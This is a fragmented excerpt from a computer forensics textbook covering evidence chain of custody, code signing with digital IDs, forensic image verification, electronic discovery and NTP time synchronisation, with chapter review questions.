A list of administrators responsible for the routine maintenance of the system
...
Specifically,
this list needs to identify the date and time each task was performed, a description of the task, who performed the task, where the task was performed, and the
results of the analysis
...

A separate notebook should be used for each investigation
...
It should be bound in such a way that it is obvious if
a page or pages have been removed
...
Therefore,
it must be as detailed as possible to assist in maintaining this chain
...
To avoid confusion, the number of people assigned this task should be
kept to a minimum
...
This person will tag all evidence and work with the
person responsible for the evidence notebook to ensure that this information is
properly recorded
...
The data will include complete copies of drives on compromised or suspect systems, as well as all relevant log files
...

A simple file copy is not sufficient to serve as evidence in the case of compromised
or suspect systems
...

A reliable copy process has three critical characteristics
...
This includes the software used to create the copy and the media on which the copy is made
...
Second, the copies
must be capable of independent verification
...

Two copies of the data should be made using an acceptable tool
...
One copy will be used for analysis and the
other copy can be put back in the system so the system can be returned to service
as quickly as possible
...
The investigation coordinator will work with the legal
team to determine the requirements for a given case
...
A detailed description of how data was transported and who was responsible for the transport, along with date, time, and route, should be included in
the log
...

Storage and Analysis of Data
Finally, the chain of custody must be maintained throughout the analysis process
...
If the corporation uses access control cards or video surveillance in other parts of the building,
consider using these devices in the forensics lab
...
The video
cameras will help determine what they did once they were inside the lab
...
It is important that evidence never
be left in an unsecured area
...

Pieces of evidence should be grouped and stored by case along with the evidence notebook
...
A detailed plan will help prevent mistakes
(which could lead to the evidence becoming inadmissible) during analysis
...
The following should be included at a minimum:
The date and time of analysis
Tools used in performing the analysis
Detailed methodology of the analysis
Results of the analysis [6]
Again, the information recorded in the evidence notebook must be as detailed
as possible to demonstrate its trustworthiness
...
R
...
803(6)), to such a degree that a court will sustain, or at least consider, a challenge to the admissibility of the evidence
...


252

Computer Forensics, Second Edition

Finally, once all evidence has been analyzed and all results have been recorded
in the evidence notebook, a copy of the notebook should be made and given to the
legal team
...
Legal officials should provide a receipt detailing all of the items received for entry into evidence
...
As a result, the world changed from analog to digital
...
An entire constellation of audio, video, communications,
and photographic devices are becoming so closely associated with the computer as
to have converged with it
...
The connectivity resulting from a single world economy, in which the companies providing goods and services are truly international, has enabled criminals
to act transjurisdictionally with ease
...

This situation requires that all nations have the ability to collect and preserve
digital evidence for their own needs as well as for the potential needs of other sovereigns
...
Though it is not reasonable to
expect all nations to know about and abide by the precise laws and rules of other
countries, a means that will allow the exchange of evidence must be found
...

Conclusions
The laws surrounding the collection and preservation of evidence are vast and
complex
...

A clearly documented plan is essential for an investigation team to be successful in collecting admissible evidence
...

Once a plan has been drafted and the incident team is assembled, practice
should begin
...

Treat the intrusion as an actual incident and follow incident handling and evidence collection procedures
...

When possible, include legal staff and local law enforcement in practice sessions
...

If resident security staff members are not equipped to perform the investigation, do not hesitate to bring in outside assistance
...

The goal is to collect and preserve evidence in such a way that it will be admissible in a court of law
...
1 in Appendix F), the computer forensics specialist (CFS) should adhere
to the provisional list of actions for duplication and preservation of digital evidence
...
A number of these systems have been
mentioned in passing already
...
The answers and solutions by chapter can be found in Appendix E
...
True or False? The computer investigator needs to be worried about destructive
process and devices being planted by the computer owner but does not need to
be concerned about the operating system of the computer and applications
...
True or False? Computer evidence is fragile by its very nature and the problem
is compounded by the potential of destructive programs and open data
...
True or False? Some of the least common reasons for improper evidence collection are poorly written policies, lack of an established incident response
plan, lack of incident response training, and a broken chain of custody
...
True or False? The complexity of criminal law means that the overwhelming
majority of cases do not make it to civil or criminal court, but should
...
True or False? If your preservation is good, it becomes fairly evident that your
collection and transportation of evidence gives rise to numerous possibilities
for error in the form of destruction, mishandling, and contamination
...
There are three criminal evidence rules to gain admissibility, except for two:
A
...
Mishandling
C
...
The best evidence rule
E
...
The following general computer evidence processing steps have been provided,
except:
A
...

B
...

C
...

D
...

E
...

3
...
Turn on or operate the subject computer
...
Don’t turn on or operate the subject computer
...
Don’t solicit the assistance of the resident “computer expert
...
Solicit the assistance of the resident “computer expert
...
Don’t evaluate employee email unless corporate policy allows it
...
Preserving a chain of custody for electronic evidence, at a minimum, requires
proving that, except:
A
...

B
...

C
...

D
...

E
...

5
...
This person will record the who, what, where, when, and how of the
investigation process
...
Who initially declined to report the suspected incident along with time,
date, and circumstances surrounding the suspected incident
B
...
Names of all persons conducting the investigation
D
...
Reasons for the investigation
Exercise
Downsizing and outsourcing overseas at a large U
...
government contractor resulted in
the termination of 500 engineers
...
He is now suing the company for millions for
being wrongly accused, which resulted in tarnishing his reputation and his standing in the community
...
What did the CFS do to prove
that the computer was involved in other crimes?
Optional Team Case Project
A small landscaping company suspecting embezzlement hired a CFST to review
their bookkeeper’s computer
...


256

Computer Forensics, Second Edition

REFERENCES
[1] “Digital Evidence Collection & Handling” (© North Carolina Wesleyan
College), North Carolina Wesleyan College, 3400 N
...

[2] Computer Evidence Processing Steps,” New Technologies, Inc
...
, Gresham, Oregon 97030, 2001
...
, Net Privacy: A Guide to Developing and Implementing an
Ironclad E-Business Privacy Plan, McGraw-Hill Professional, New York,
2001
...
, 2075
NE Division St
...

[5] Vacca, John R
...

[6] Witter, Franklin, “Legal Aspects of Collecting and Preserving Computer
Forensics Evidence,” Branch Banking & Trust, 2501 Wooten Blvd
...
, Suite 1501, Bethesda, MD 20816), 2001
...
Although these
procedures are extremely effective under the current rules of evidence, it is expected that alternative procedures will develop as technology advances
...
One of these is sealed
in the presence of the computer owner and then placed in secure storage
...
If the computer has been seized and held in secure storage by law
enforcement, this will constitute best evidence
...
In either case, the assumption is that
while in secure storage, there can be no possibility of tampering with the evidence
...

A growing practical problem with this method of evidential copying occurs not
because of the security aspect or appearance of the situation, but because of the increasing sizes of fixed disks found in computers
...

The cost of the media is decreasing slowly, but this is still significant when considering the quantity of information to be copied and stored (even though the system does
allow for media reuse)
...
A sizable saving in both time and expense might, therefore, be achieved if an alternative method of evidential security could be arranged
...
These display varying degrees of security and complexity, but all of them rely on a second channel of information,
whereby certain elements of the encryption/decryption/authentication processes
are kept secret
...

Consider the investigative process where computers are concerned
...
It may
be possible to seize or impound the computer system, but this risks violating the
basic principle of innocent until proven guilty, by depriving an innocent party of the
use of his or her system
...

When this is done, the courts may rightly insist that the copied evidence is protected from either accidental or deliberate modification and that the investigating
authority should prove that this has been done
...

This protection takes two forms: a secure method of determining that the data
has not been altered by even a single bit since the copy was taken and a secure method
of determining that the copy is genuinely the one taken at the time and on the computer in question
...

It is argued that when considering forensic copies of computer contents, encryption of data is not the point at issue
...


DIGITAL IDS AND AUTHENTICATION TECHNOLOGY
When customers buy software in a store, the source of that software is obvious
...
These factors enable customers to make decisions about what software
to purchase and how much to “trust” those products
...
The Internet lacks
the subtle information provided by packaging, shelf space, shrink wrap, and the like
...

It’s difficult to make the choice of downloading the software from the Internet
...
When
customers download software signed with Authenticode and verified by VeriSign,
they should be assured of content source, indicating that the software really comes
from the publisher who signed it, and content integrity, indicating that the software
has not been altered or corrupted since it was signed
...
Authenticode from Microsoft and Digital IDs from
VeriSign are mentioned here for illustration purposes only
...
In the extreme case
that software performs unacceptable or malicious activity on their computers, users
can pursue recourse against the publisher
...

Developers and Webmasters should benefit from Authenticode, because it puts
trust in their name and makes their products harder to falsify
...
With
Authenticode, users can make educated decisions about what software to download,
knowing who published the software and that it hasn’t been tampered with
...
For example, Authenticode is currently used to sign 32-bit
...
cab files,

...
class files
...


260

Computer Forensics, Second Edition

VeriSign offers a Class 3 Digital ID designed for commercial software publishers
...
This class
of digital IDs provides the identity of a publishing organization and is designed to
represent the level of assurance provided today by retail channels for software
...
These
applications are often used to obtain other pieces of software
...
For example, when a user visits a Web page that uses executable files to
provide animation or sound, code is often downloaded to the end user’s machine to
achieve the effects
...

If an end user of one of these applications encounters an unsigned component
distributed via the Internet, the following will occur: if the application’s security settings are set on High, the client application will not permit the unsigned code to
load; if the application’s security settings are set on Medium, the client application
will display a warning similar to the screen shown in Figure 8
...


FIGURE 8
...


Computer Image Verification and Authentication

261

By contrast, if a user encounters a signed applet or other code, the client application will display a screen similar to the one shown in Figure 8
...
Through
Authenticode, the user is informed:

FIGURE 8
...


Of a place to find out more about the control
The authenticity of the preceding information
Users can choose to trust all subsequent downloads of software from the same
publisher
...
Simply by
clicking the More Info button, users can inspect the certificate and verify its validity,
as shown in Figure 8
...


T ECHNICAL O VERVIEW
A digital ID (also known as a digital certificate) is a form of electronic credentials for
the Internet
...

The third party who issues certificates is known as a certification authority (CA)
...
In public key cryptography systems, every entity has two complementary keys (a public key
and a private key) that function only when they are held together
...
Any code digitally signed with the publisher’s private key can only be successfully verified using the complementary public key
...
3 Inspect the certificate and verify its validity
...

The purpose of a digital ID is to reliably link a public and private key pair with
its owner
...
Just as when a government issues you a passport, it is
officially vouching for the fact that you are who you say you are
...


C ERTIFICATION A UTHORITIES
CAs such as VeriSign are organizations that issue digital certificates to applicants whose
identity they are willing to vouch for
...
As the Internet’s leading CA, VeriSign has the following responsibilities:
Publishing the criteria for granting, revoking, and managing certificates
Granting certificates to applicants who meet the published criteria
Managing certificates (enrolling, renewing, and revoking them)
Storing VeriSign’s root keys in an exceptionally secure manner
Verifying evidence submitted by applicants

Computer Image Verification and Authentication

263

Providing tools for enrollment
Accepting the liability associated with these responsibilities
Timestamping digital signatures

H OW A UTHENTICODE W ORKS

WITH

V ERI S IGN D IGITAL ID S

Authenticode relies on industry-standard cryptography techniques such as X
...
These are
well-proven cryptography protocols, which ensure a robust implementation of
code-signing technology
...

Authenticode uses digital signature technology to assure users of the origin and
integrity of software
...
To save time, the Authenticode protocols use a cryptographic digest, which is a one-way hash of the document
...
4 [2]
...
Generic Hash
Original
Code

1
...
Compare

Signed Code
One-Way Hash
3
...
4 Authenticode: VeriSign Digital ID process
...
Publisher obtains a software developer digital ID from VeriSign
...
Publisher creates code
3
...
EXE utility, the publisher
a
...
Encrypts the hash using his private key
c
...
The end user encounters the package
...
The end user’s browser examines the publisher’s digital ID
...

6
...

7
...

8
...
If they are identical, the
browser messages that the content has been verified by VeriSign, and the
end user has confidence that the code was signed by the publisher identified
in the digital ID and that the code hasn’t been altered since it was signed
...


T IMESTAMPING
Because key pairs are based on mathematical relationships that can theoretically be
“cracked” with a great deal of time and effort, it is a well-established security principle that digital certificates should expire
...
However, most software is intended to have a lifetime of
longer than one year
...
Now, when you sign code, a hash
of your code will be sent to VeriSign to be timestamped
...

This code should be trusted [2]
...
These requirements
were chosen to reflect the experience of computer forensic investigators
...
Forensic data collection should be complete and non-software specific,
thus avoiding software traps and hidden partitioning
...
In operation, it should be as quick and as simple as possible to avoid error
or delay
...
It should be possible for anyone to use a forensic data collection system
with the minimum amount of training
...
Necessary costs and resources should be kept to a minimum [1]
...
For the collection phase
to remain quick and simple, the digital integrity verification and authentication
protocol must not add significantly to the time required for copying, nor should
there be additional (possibly complex) procedures
...
It would add to the cost
and complexity with little increase to security
...
Who is to issue these? Where are they to be stored? How will each individual remember his or her own key? How can misuse of keys be detected?
The digital integrity verification and authentication protocol described in the next
section is virtually a self-contained system
...
However, within the digital integrity
verification and authentication protocol, alternative channels of security are used to
provide a truly secure system, but at much lower cost in time and consumables
...
It must be understood that during the copying process, procedures are
implemented to trap and handle hardware errors, mapping exceptions where necessary
...
This information is stored on each cartridge within
a copy series
...
The remainder (in fact the bulk) of each cartridge contains the information copied from the suspect drive on a sector by sector basis
...
On the one hand, it’s a topic that chief information officers (CIOs) repeatedly cite as one of their most important issues, if not the most important
...
Perhaps that’s because relatively few security breaches
have hit their organizations—and most of those are of the nuisance variety, which
doesn’t cost a lot of hard dollars
...
With that in mind, let’s take a look at why there
isn’t a sense of urgency in implementing image verification and authentication
security considerations
...
Ultimately, with everything changing, the struggle for security is a constant battle
...

Organizations must be constantly vigilant
...
It is expected that the number of vulnerabilities reported in 2002 will be triple the previous year’s number
...
The costs will continue to grow as the world becomes more
interconnected and as the cleverness of those who would cause harm increases
...
cert
...
In 2003, CERT/CC recorded more than 40,000 incidents
...
They study Internet
security vulnerabilities, handle computer security incidents, publish security alerts,
research long-term changes in networked systems, and develop information and
training to help you improve security at your site
...
When 30 computer security experts involved in a sparetime endeavor called The Honeynet Project hooked a typical computer network to
the Internet to see what hackers would do, the network was probed and exploited

Computer Image Verification and Authentication

267

in 15 minutes
...
That’s what makes the Honeynet Project different from other kinds of
risk management
...
The biggest
issue most companies face is how to allow users to do everything they need to do to
be efficient from a business standpoint without opening the door to an attack
...
Some take
precautions when employees are being dismissed—quickly removing their network
access, for example
...
Employees can definitely cause problems if they don’t do the right thing
...
Most CIOs view their staff as a
strength in their overall information security program
...
They
have to understand that most business is built on trust, and their role in maintaining that trust is critical
...
Usually it’s not an issue,
because, in the case of a virus outbreak, everybody is affected
...

Some esoteric things, such as virtual private network (VPN) hardware or encrypting
outside communications, are a little harder to sell
...
Non-staff employees can understand it on a gut level, but after all, companies are not the Defense Department—
they don’t make nuclear arms; they roll and distribute stainless steel or other
products
...
CERT/CC encourages technical and business-side people to work together because they will bring different
perspectives to the matter
...
Security is a mindset and a management practice
as much as it is a technology
...
It’s more political than technical
...
You should not try to deal with problems unless
there really are problems
...

Financial institutions have had to conform to the Gramm-Leach-Bliley Act of
1999, which governs these institutions and the privacy of their customer information [3]
...
Financial

268

Computer Forensics, Second Edition

institutions have to prove that they are securing their members’ information
...
In the past it was
“Show me your vaults, show me your cameras, show me your paper-shredders
...

In the end, it’s difficult, perhaps impossible, to measure the return on investment in security, but perhaps that’s the wrong way to think about it
...
You can’t overspend,
really
...
It only takes one time—one hacker getting in
and stealing all your financial data
...


SUMMARY
The overall security of a computer image verification and authentication system
rests in the combination of security measures
...
As well as providing continuity between blocks, this negates the redundancy encountered when copying the type of data found on fixed disks
(quantities of zeroes, ASCII text, and fixed structures)
...

The encryption of the vault, because it only occurs at the end of each section of
the copy, can be accomplished using a secure encryption algorithm
...
In the event of a challenge, one or both envelopes can be opened in
court and verified against each other and the cartridges
...

Image verification and authentication security involves a relatively straightforward risk-management equation (the more security you put in place, the more
onerous it is for end users), and until the technology arrives to make impenetrable
security invisible to end users, it will remain that way
...
However, CIOs aren’t instituting enough of the highprofile risk-assessment measures that would increase awareness of the problem
throughout their corporations
...

Copying directly to CD-ROM is not possible without some buffer drive to enable correct data-streaming; this introduces a number of potential problem
areas both with the increasingly complex hardware and evidential continuity
...

Copying to tape is less expensive, but the viability of data stored for long periods (in many cases years), particularly if unattended, is also extremely suspect
...

Software-copying packages intended for use on nonspecific peripheral storage
devices raise problems of technical support and hardware matching
...

The process of copying fixed disks at BIOS level has enabled DIBS® to avoid
problems with operating systems and access control mechanisms while the
drive restoration process has proven capable of dealing with all currently available operating systems on the PC platform
...
Note that this protection depends on neither how securely the copy cartridges are stored nor the relative security
attending the storage of the floppy disks
...

When it comes to security readiness, company size doesn’t matter
...

Security breaches normally cost larger companies $90,000, compared with
$78,000 for smaller companies
...

Larger companies are also more likely to be hit with a virus than smaller companies and more likely to have their Web sites defaced
...

The role of senior business executives in beefing up security is significant, but
CIOs continue to express concerns about their executives’ approaches to security
...
At the
same time, CIOs don’t seem to be taking all the steps they could or should be
taking to make security a higher priority for their companies
...

Anti-virus software and firewalls are far and away the most frequently deployed
technologies
...

Technologies not yet widely deployed include image verification and authentication, decoy services, risk-assessment software, and public key information
(PKI) document encryption
...


An Agenda for Action
When completing the Computer Image Verification and Authentication Checklist
(Table F8
...
The order is not significant; however, these are the activities for which the researcher would want to provide a detailed description of procedures, review, and
assessment for ease of use and admissibility
...

Finally, let’s move on to the real interactive part of this chapter: review questions and exercises, hands-on projects, case projects, and optional team case project
...


Computer Image Verification and Authentication

271

CHAPTER REVIEW QUESTIONS AND EXERCISES
True/False
1
...

2
...

3
...

4
...

5
...

Multiple Choice
1
...
The true identity of the publisher
B
...
The authenticity of the preceding disinformation
D
...
The authenticity of the preceding information
2
...
Publishing the criteria for granting, revoking, and managing certificates
B
...
Managing certificates (enrolling, renewing, and revoking them)
D
...
Verifying evidence submitted by applicants
3
...
The process is outlined by the following, except:
A
...

B
...

C
...
EXE utility
...
The end user encounters the package
...
The end user’s browser examines the publisher’s digital ID
...

4
...
These
requirements were chosen to reflect the experience of computer forensic investigators
...
Forensic data collection should be complete and non-software specific,
thus avoiding software traps and hidden partitioning
...
In operation, it should be as slow and as difficult as possible to avoid
error or delay
...
It should be possible for anyone to use a forensic data collection system
with the minimum amount of training
...
Necessary costs and resources should be kept to a minimum
...
In operation, it should be as quick and as simple as possible to avoid
error or delay
...
Within the current raw data content of the suspect disk drive, a copy is also
taken of the high section of conventional memory (to include any on-board
ROM areas) and the CMOS contents via port access
...
Also stored on each cartridge is a reference area containing copy-specific information such as the following, except:
A
...
Deleting drive serial number
C
...
Exhibit details and reference comments
E
...
The government agency alleged that the company had violated
its agreement and filed a lawsuit
...
Almost all the data resided on

Computer Image Verification and Authentication

273

backup tapes
...
The company
turned to a CFS team (CFST) to compile the data necessary to meet the discovery
request
...
The irregularities were serious
enough to potentially necessitate a re-stating of earnings
...
They retained a CFST to
conduct large-scale data mining to get to the bottom of the irregularities
...
The bank sent the computer to a CFST for computer forensic examination
...
She was fired from her job for “poor performance” and subsequently sued her ex-boss and the former employer
...
How did the CFST go about conducting the investigation?

REFERENCES
[1] “DIVA Computer Evidence: Digital Image Verification and Authentication,” Computer Forensics UK Ltd, Third Floor, 9 North Street, Rugby,
Warwickshire, CV21 2AB, U
...
, 2002
...

[3] “Vacca, John R
...

[4] “Vacca, John R
...


Part

III

Computer Forensics
Analysis

he third part of this book covers the discovery of electronic evidence, identification of data, reconstructing past events, and networks
...
Increasingly important business information is created, stored, and communicated electronically [1]
...
As companies have increased their reliance on their computer systems, lawyers have begun to be aware of the valuable electronic treasures
that are now being kept in these systems and have started aggressively to target electronic data for discovery in all types of litigation cases
...

Plaintiffs’ lawyers have increasingly targeted electronic evidence for a number
of reasons
...
Numerous statutory provisions empower government
officials to enter, inspect, and make copies of records that must be maintained pursuant to various statutes and regulations
...
Many businesses are increasingly
storing the required records in electronic form
...

The government also has access to records for investigatory purposes
...
For example, under the Competition Act, peace officers with, or in exigent

C

277

278

Computer Forensics, Second Edition

circumstances without, a search warrant, may enter the premises, examine records, and
copy or seize them
...

Plaintiffs’ lawyers and government investigators need to develop the knowledge
and skills necessary to take advantage of the information residing in electronic form
...
Lawyers who choose
to ignore these new opportunities could expose themselves to malpractice claims
...
Defensive strategies that should be implemented prior to litigation include a proper document retention program, periodic
purging of magnetic media, and the implementation of a document management
system
...

Now, let’s begin the discussion of electronic document discovery
...


ELECTRONIC DOCUMENT DISCOVERY:
A POWERFUL NEW LITIGATION TOOL
Other than direct testimony by an eyewitness, documentary evidence is probably
the most compelling form of evidence in criminal and civil cases
...
The same is true about documents used to conduct financial transactions
...
Traditional paper documents have been sought in the legal discovery process for hundreds of years in cases involving white collar crime (financial
frauds, embezzlements)
...

Today, judges and attorneys are very familiar with documentary evidence in paper
form
...

In years past, documentary evidence was limited to paper documents
...
Today, documents are rarely typed or handwritten
...
Most professionals rely on personal computers to maintain schedules and to
create their written communications
...
As a result, more documentary evidence exists today than ever before and it exists in a variety of electronically stored formats
...
Many are exchanged over the Internet and are read on the
computer screen
...

The best evidence rules also work differently today, because copies of computer
files are as good as the original electronic document
...
There is no difference between the
original and an exact copy
...
This is especially true for the
creation of documents on a computer word processor
...
The computer user is usually not aware of this situation
...
Most of this data is beyond the reach or knowledge
of the computer user who created the data
...
Lawyers are just beginning
to understand the evidentiary value of computer-related evidence and computer
forensics in the document discovery process
...
These new forms of
documentary evidence have broadened the potential for legal discovery
...

From a computer forensics perspective, computer data is stored at multiple levels
on computer storage media
...
When computer files are deleted, the data is not really deleted
...
Government intelligence agencies have relied on these secret computer storage areas for years, but the
word is starting to get out
...
This is especially true in cases involving the theft
of corporate trade secrets and in wrongful dismissal lawsuits
...


280

Computer Forensics, Second Edition

A historical perspective helps one understand the evolution of computer forensics and its transition into the new field of electronic document discovery
...
Personal computers
were no longer thought of as toys; almost overnight they were accepted as reliable
business computers because of the IBM endorsement
...
They have also migrated into millions of households, and their popularity exploded during the 1990s
when people discovered the Internet
...
Powerful personal computers are technology workhorses
that increase productivity and provide portability
...
However, essentially all personal computers lack meaningful
security
...
The DOS operating system installed on the original IBM PC was never intended for commercial use
...
As a result, most
popular desktop PCs and notebook computers lack adequate security
...
Some computer forensics specialists regard
electronic document discovery as nothing more than the exploitation of the inherent security weaknesses in personal computers and the Internet
...
You would
also think that individuals who carry secrets on their desktop and notebook computers would be more careful given these inherent security weaknesses
...
It is likely that most
lawyers don’t even understand the potentials for attorney–client information to be
compromised when computer files and data are exchanged with others
...
However, they provide great
benefits to lawyers because of the potentials of electronic document discovery
...
This situation provides the technology savvy attorney with an edge when it comes to document discovery
...
The attorney just needs to understand the potentials and
the new twist in thinking that is required to reap the benefits of electronic document discovery [2]
...
With businesses and individuals relying on computers for data processing, scheduling, and communications, it is possible to discover anything from background information to the “smoking gun” document by investigating what is on
your opponent’s computer systems
...
Because information discovery only deals with logical evidence (electronic data), you can avoid much of the tedium required by search and
seizure to ensure evidence integrity and the chain of custody
...

Finally, for information discovery, where the basics are concerned, the investigator is occupied with safeguarding the chain of custody
...
Backups of
discovered information files are critical to the overall process, and tools such as
revision-control software can be very handy for this task
...

Three basic rules of thumb should act as guides for any information discovery
...

The notable difference between searching for physical evidence and searching
for logical evidence is that in the latter there is much less structure
...

Once information is found, rigorous methods are applied to its handling and
processing
...
Although different in their implementations, these areas share a few
prominent common principals
...
Both approaches require that everything the investigator does be carefully documented
...
Without such a facility, the investigator
will have a difficult (if not impossible) time maintaining the chain of custody
while examining and holding evidence
...

In a venue where law enforcement authorities are investigating a computer
crime, there is a measurable chance that a case could find its way to court
...

Companies loathe being involved in litigation—even in situations where it appears the law is on their side
...
” For this reason, much of what the corporate computer fraud
and abuse investigator does is for naught
...
R
...

Most of the computer crime cases handled by the corporate investigator won’t
end up in litigation
...

Because practically any case can turn into a matter for litigation, the corporate investigator needs to treat all cases with a proper and reasonable amount
of attention
...
1 in Appendix F), the computer forensics specialist (CFS) should adhere to the provisional
list of actions for discovery of electronic evidence
...
A number of these systems have been mentioned in passing already
...
The answers and solutions by chapter can be found in Appendix E
...
True or False? Other than direct testimony by an eyewitness, documentary evidence is probably the most compelling form of evidence in criminal and civil
cases
...
True or False? Biometric technology has revolutionized the way you deal with
information and the way you run your businesses
...
True or False? Numerous statutory provisions empower government officials
to enter, inspect, and make copies of records that must be maintained pursuant
to various statutes and regulations
...
True or False? Many businesses are increasingly storing their required records
in hard copy form
...
True or False? CPAs representing parties with large amounts of electronic data
need to understand that their clients’ data will be targeted for such discovery
and need to advise their clients on how to prepare
...
Under the Competition Act, peace officers with, or in exigent circumstances
without, a search warrant, may do the following, except:
A
...
Examine records
C
...
Seize records
E
...
In recent times, documentary evidence has become the keystone in civil cases
involving the following, except:
A
...
Sexual discrimination
C
...
Stock options
E
...
It is becoming more common for lawyers to seek production of the following,
except:
A
...

C
...

E
...
Since their introduction, IBM PCs and compatible computers have evolved
into the following, except two:
A
...
Powerful calculators
C
...
Desktop computers
E
...
As a result, most popular desktop PCs and notebook computers lack adequate
security
...
Computer files
B
...
Added files
D
...
Erased files
Exercise
A patient with a heart ailment was transported to a hospital where an angiogram
was performed
...
A third angiogram was performed
immediately after the patient’s death
...
The day following the patient’s
death, hospital staff were able to locate images for the first and third angiograms
but could not find any images of the second procedure
...
The plaintiffs also
claimed the defendants had deliberately deleted the images of the second angiogram that allegedly proved the wrongful death claim
...
Explain the possible actions that the CFST
took to locate the images
...
The executive, disgruntled because of his demotion, was later terminated; it was subsequently determined that the executive
had planned to quit about the same time he was fired and establish a competitive
company
...
Suspicious that critical information
had been taken; the company’s attorneys sent the computers to a CFST for examination
...
The drives were previewed less than an hour after management
determined that the investigation was necessary and that time was of the essence
...
What occurred during that analysis?
Optional Team Case Project
A large government agency, through a CFST, was able to enable a rapid incident response and capture sensitive data in a timely manner [3]
...
, The Essential Guide to Storage Area Networks, Prentice Hall,
New York, 2002
...
, 2075 NE Division St
...

[3] “EEE in Action: Real-World Scenarios” (Copyright 2004 Guidance Software, Inc
...
, 215 N
...
, 2nd Floor,
Pasadena, CA 91101, 2004
...

The Internet gives computer users access to a wealth of information
...
International boundaries no longer exist when it comes to the
exchange of information over the Internet
...
However, the Internet also provides the crooks with communication capabilities that did
not exist previously
...
It is sad but very true
...

More and more, law enforcement agencies are encountering computers at
crime scenes
...
Internet-related crimes are clearly on the rise,
and abuses of corporate and government Internet accounts by employees are becoming commonplace
...
He was using his corporate Internet account, on company time,
to run his side business
...

To make matters worse, he was also using the corporate computers on company
time to view and download pornographic images from the Internet
...
Just recently, law enforcement officials in Herndon, Virginia, requested help in the investigation of the rape of a young girl
...
When the rapist was finally caught, his computer contained crucial evidence
in the case
...
Funding is finally being focused on the creation of
local and state computer crime units
...

Some of these training efforts are directed at Internet-related crimes, and more
training emphasis will be placed on this important technology issue in the future
...
In other
words, being able to investigate incidents that involve multiple computers is much
easier when the timestamps on files (identified data) and in logs are in sync
...
With NTP, you can synchronize against truly accurate time sources
such as the atomic clocks run by the National Institute of Standards and Technology (NIST), the U
...
Naval Observatory, or counterparts in other countries around
the world
...
This protocol is capable of synchronizing
distributed clocks within milliseconds over long periods of time
...
The package that implements the latest version of NTP is called
xntp™ and was developed at the University of Delaware
...
rs
...
umich
...
tar
...
You may also find binary distributions there
...
tar
...
4h-sunos4
...
Z)
...


Identification of Data

289

What does accurate timekeeping have to do with computer forensics? Keeping
a consistent sense of time is critical for many computer-forensic-related activities
...
Many
authentication systems, Kerberos being the most prominent example, use dated
tickets to control access to systems and resources
...

NTP began as a tool that permitted researchers to synchronize workstation
clocks to within milliseconds or better
...
Newer versions of NTP
fixed the problem by providing a model for automatic configuration and key exchange
...

Time Matters
Why bother having accurate clocks? Isn’t the one that comes in your desktop PC or
your enterprise server adequate? The answer is that accurate timekeeping is an advanced science, an avocation practiced by hundreds of scientists around the world,
and the paltry clock chip you have in your PC or expensive server winds up being
a bit less accurate than your Swatch® watch for several reasons
...
Not all quartz
crystals are the same to begin with, but put one inside a nice, hot computer that’s
cool whenever it’s turned off, and the crystal’s frequency tends to wander
...
Delays in processing these interrupts cause Unix system clocks to lose time—
slowly, but erratically
...

Over time, scientists and programmers have developed different techniques
for synchronizing clocks over TCP/IP or other network protocols
...
Though these
remain available Internet standards, neither is currently sufficient for accurate
timekeeping, and, hence, both are considered out-of-date
...
There
are modem-based programs that contact NIST timeservers and fetch a time message (along with an estimate of round-trip time to account for latency), which you
can still use today
...
The University of Delaware site (http://www
...
udel
...
html) includes
lists of stratum-one servers in the United States; you can also find stratum-one
servers through Web search engines
...

Below stratum-one servers are many stratum-two servers; stratum-three
servers are below that, and so on
...
To improve each server’s notion of time, servers in the same stratum may peer (that is, act
as equals) and perform the same timestamp exchanges done by NTP clients
...
This was NTP’s only security provision for a while
...
NTP guards against
this in several ways
...
Also, if a system has been using
NTP, the NTP software assumes that changes in a local clock will be small, generally less than a second
...

NTP goes beyond this by collecting timestamps from many servers (and peers,
if appropriate)
...

For example, the outlyers in the sample (the timestamps with the largest divergence) are discarded
...
On Unix systems, a special system call, adjtime (),
makes small adjustments to system time
...
You can modify the configuration of ntpd to label a timeserver as untrusted
...

By the late 1980s, version 2 had been released
...
NTP uses user datagram protocol

Identification of Data

291

(UDP) packets (on port 123), which are easy to spoof because of their stateless nature (no connection setup, as in TCP)
...
The most interesting aspects of version 4 are the security improvements
...
When a client contacts an NTP server, the client can collect a
certificate that contains the server’s public key and independently verifies it
...
The key ids are used with session keys to perform a quick
digital signature check based on Message Digest 5 (MD5)
...
Public
key encryption algorithms aren’t only slow (compared to private key algorithms
such as RC4), they’re also inconsistent in that the amount of time used to encrypt
may vary by a factor of two—something very unpleasant for those obsessed with
keeping accurate time
...

Version 4 also supports the Diffie-Hellman key exchange for peers, so that
peers can exchange private session keys
...


FORENSIC IDENTIFICATION AND ANALYSIS
OF TECHNICAL SURVEILLANCE DEVICES
It was one sentence among hundreds in a transcription of a dull congressional hearing
on the environment, a statement anyone might have missed: Bristol-Myers Squibb Co
...
However, the
competitive intelligence (CI) officer at arch rival SmithKline Beecham Corp
...

The intelligence officer sprang into action
...
But why was Bristol-Myers suddenly seeking to cut down 200 times
as many yews? Was it ready to put its planned anticancer drug, Taxol, into production? Back at SmithKline headquarters in Philadelphia, the news was enough to
trigger serious nail-biting in the boardroom
...
Would
it beat Bristol-Myers’ drug to market? Or would SmithKline Beecham have to speed
up its production schedule—and if so, by how much?

292

Computer Forensics, Second Edition

The intelligence officer’s team wasted no time
...
It tapped into Web sources
on the environment and got staffers to work the phones, gathering names of researchers working for Bristol-Myers
...

Sure enough, Bristol-Myers had been taking out recruitment ads in those areas’
newspapers for cancer researchers—a sure sign that Bristol-Myers was stepping up
its hiring of oncologists specializing in breast cancer
...

That was all the intelligence officer needed to hear
...
The CIA, the National Security Agency, and
England’s MI5 used a form of CI to figure out what the Russians were doing
...

SmithKline Beecham’s tale of how competitive intelligence saved a company
millions is no longer unusual
...
The number of large corporations with CI units has quadrupled since 1997, and spending on
CI is estimated to be around $32 billion annually—nearly double the amount spent
just two years ago
...
As far back as the 1970s, in a now-famous example of excess zeal, The Boeing Company discovered that a Russian delegation
visiting one of its manufacturing plants was wearing crepe-soled shoes that would
surreptitiously pick up metal shavings off the factory floor to determine the type of
exotic metal alloys Boeing was using in its planes
...
, the former
chief of CI used to work for the CIA
...
In a May 2003 survey by marketing firm TR Cutler, Inc
...
trcutler
...
S
...

Corporate Information
Now, here’s a real secret: until recently, most corporate gumshoeing was being outsourced to spy companies with 007-sounding names such as WarRoom Research

Identification of Data

293

Inc
...
Now, though, corporate
snooping is increasingly being conducted in-house—and for the first time, chief information officers (CIOs) are being forced to the frontlines
...
And why not? Information
is about technology, and information is increasingly a company’s competitive edge
...
This is now a double-edged sword
...

